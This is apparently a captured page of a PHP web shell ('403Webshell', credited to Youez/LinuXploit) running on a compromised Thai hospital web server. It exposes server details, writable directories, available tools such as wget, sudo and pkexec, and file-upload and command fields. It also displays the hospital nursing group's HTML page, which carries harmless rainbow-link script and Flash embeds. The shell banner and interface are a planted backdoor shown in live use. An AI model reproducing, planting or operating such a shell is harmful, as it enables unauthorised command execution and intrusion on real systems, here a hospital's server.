403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/Menu_Nurse/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/Menu_Nurse/กลุ่มการพยาบาล1.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>กลุ่มการพยาบาล</title>
  <link rel="stylesheet" type="text/css" href="assets/bootstrap.css" />
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">

<SCRIPT language=JavaScript> 
var rate = 20; // Increase amount(The degree of the transmutation) 
var obj; // The object which event occured in 
var act = 0; // Flag during the action 
var elmH = 0; // Hue 
var elmS = 128; // Saturation 
var elmV = 255; // Value 
var clrOrg; // A color before the change 
var TimerID; // Timer ID 
if (navigator.appName.indexOf("Microsoft",0) != -1 && parseInt(navigator.appVersion) >= 4) { 
Browser = true; 
} else { 
Browser = false; 
} 
if (Browser) { 
document.onmouseover = doRainbowAnchor; 
document.onmouseout = stopRainbowAnchor; 
} 
function doRainbow() 
{ 
if (Browser && act != 1) { 
act = 1; 
obj = event.srcElement; 
clrOrg = obj.style.color; 
TimerID = setInterval("ChangeColor()",100); 
} 
} 
function stopRainbow() 
{ 
if (Browser && act != 0) { 
obj.style.color = clrOrg; 
clearInterval(TimerID); 
act = 0; 
} 
} 
function doRainbowAnchor() 
{ 
if (Browser && act != 1) { 
obj = event.srcElement; 
while (obj.tagName != 'A' && obj.tagName != 'BODY') { 
obj = obj.parentElement; 
if (obj.tagName == 'A' || obj.tagName == 'BODY') 
break; 
} 
if (obj.tagName == 'A' && obj.href != '') { 
act = 1; 
clrOrg = obj.style.color; 
TimerID = setInterval("ChangeColor()",100); 
} 
} 
} 
function stopRainbowAnchor() 
{ 
if (Browser && act != 0) { 
if (obj.tagName == 'A') { 
obj.style.color = clrOrg; 
clearInterval(TimerID); 
act = 0; 
} 
} 
} 
function ChangeColor() 
{ 
obj.style.color = makeColor(); 
} 
function makeColor() 
{ 
if (elmS == 0) { 
elmR = elmV; elmG = elmV; elmB = elmV; 
} 
else { 
t1 = elmV; 
t2 = (255 - elmS) * elmV / 255; 
t3 = elmH % 60; 
t3 = (t1 - t2) * t3 / 60; 
if (elmH < 60) { 
elmR = t1; elmB = t2; elmG = t2 + t3; 
} 
else if (elmH < 120) { 
elmG = t1; elmB = t2; elmR = t1 - t3; 
} 
else if (elmH < 180) { 
elmG = t1; elmR = t2; elmB = t2 + t3; 
} 
else if (elmH < 240) { 
elmB = t1; elmR = t2; elmG = t1 - t3; 
} 
else if (elmH < 300) { 
elmB = t1; elmG = t2; elmR = t2 + t3; 
} 
else if (elmH < 360) { 
elmR = t1; elmG = t2; elmB = t1 - t3; 
} 
else { 
elmR = 0; elmG = 0; elmB = 0; 
} 
} 
elmR = Math.floor(elmR); 
elmG = Math.floor(elmG); 
elmB = Math.floor(elmB); 
clrRGB = '#' + elmR.toString(16) + elmG.toString(16) + elmB.toString(16); 
elmH = elmH + rate; 
if (elmH >= 360) 
elmH = 0; 
return clrRGB; 
} 
</SCRIPT>

<center>

  <div id="main-content">
    <div class="container first-container">
      <div class="panel panel-primary">
        <div class="panel-heading text-center">
          <h1>กลุ่มการพยาบาล</h1>
        </div>

  <table width="800" border="0">
    <tr bgcolor="#00CCFF">
      <td width="82"><div align="center"><a href="โครงสร้าง.html" class="navbar nav-tabs">โครงสร้าง</a></div></td>
      <td width="67"><div align="center"><a href="บุคลากร.html" class="navbar">บุคลากร</a></div></td>
      <td width="74"><div align="center"><a href="พันธกิจ.html" class="navbar"s>พันธกิจ</a></div></td>
      <td width="78"><div align="center"><a href="นโยบาย.html" class="navbar">นโยบาย</a></div></td>
      <td width="95"><div align="center"><a href="วัตถุประสงค์.html" class="navbar">วัตถุประสงค์</a></div></td>
	  <td width="95"><div align="center"><a href="wd/index.php" target="_blank" class="navbar">Ward Daily Dashboard</a></div></td>
      <td width="65"><div align="center"><a href="IC/index.html" target="_blank" class="navbar">IC</a></div></td>
    </tr>
  </table>

  <table width="628" border="1">
    <tr>
      <td width="618"><table width="608" height="270" border="0">
        <tr bordercolor="#FFFFFF">
          <td width="62" height="116">&nbsp;</td>
          <td width="543" bordercolor="#FFFFFF"><p><span class="style14">ยินดีต้อนรับเข้าสู่ กลุ่มการพยาบาล โรงพยาบาลสัตหีบ กม.10</span> <img src="img/nursehat2.gif" width="77" height="59" /></p>
              <p>&nbsp;</p>
            <table width="581" border="0">
                <tr>
                  <td><span class="style14">
                    <marquee scrollamount="4" >
                    <strong>"ยิ้มแย้มแจ่มใส ฉับไวบริการ วิชาการพัฒนา สรรหาคุณภาพ "</strong>
                    </marquee>
                  </span></td>
                </tr>
              </table>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p> <span class="style16">Link</span> <img src="../images/logo/arr.gif" width="9" height="6" /> <a href="IC/index.html" target="_blank" class="style15"style="text-decoration: none;">งานป้องกันและควบคุมการติดเชื้อภายในโรงพยาบาล </a></p>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</p></td>
        </tr>
        <tr bordercolor="#FFFFFF" bgcolor="#000000">
          <td colspan="2"><embed height="110" type="application/x-shockwave-flash" width="144" src="http://imgfree.21cn.com/free/flash/173.swf" wmode="transparent"></embed>
            <embed src="http://imgfree.21cn.com/free/flash/52.swf" width="145" height="76" align="bottom" type="application/x-shockwave-flash" wmode="transparent"></embed>
            <embed src="http://imgfree.21cn.com/free/flash/52.swf" width="145" height="76" align="bottom" type="application/x-shockwave-flash" wmode="transparent"></embed>
            <embed src="http://imgfree.21cn.com/free/flash/52.swf" width="145" height="76" align="bottom" type="application/x-shockwave-flash" wmode="transparent"></embed></td>
        </tr>
      </table></td>
    </tr>
  </table>
  <img src="img/Header1.jpg" width="624" height="78" /><br>

<p align="center"><span class="style11">Copyright<img src="../images/logo/copyright.jpg" width="13" height="16" />  2010 Pozedorn@gmail.com sattahip km.10 hospital.</span><br clear="all" />
  <strong> </strong></p>
  </div>
  </div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit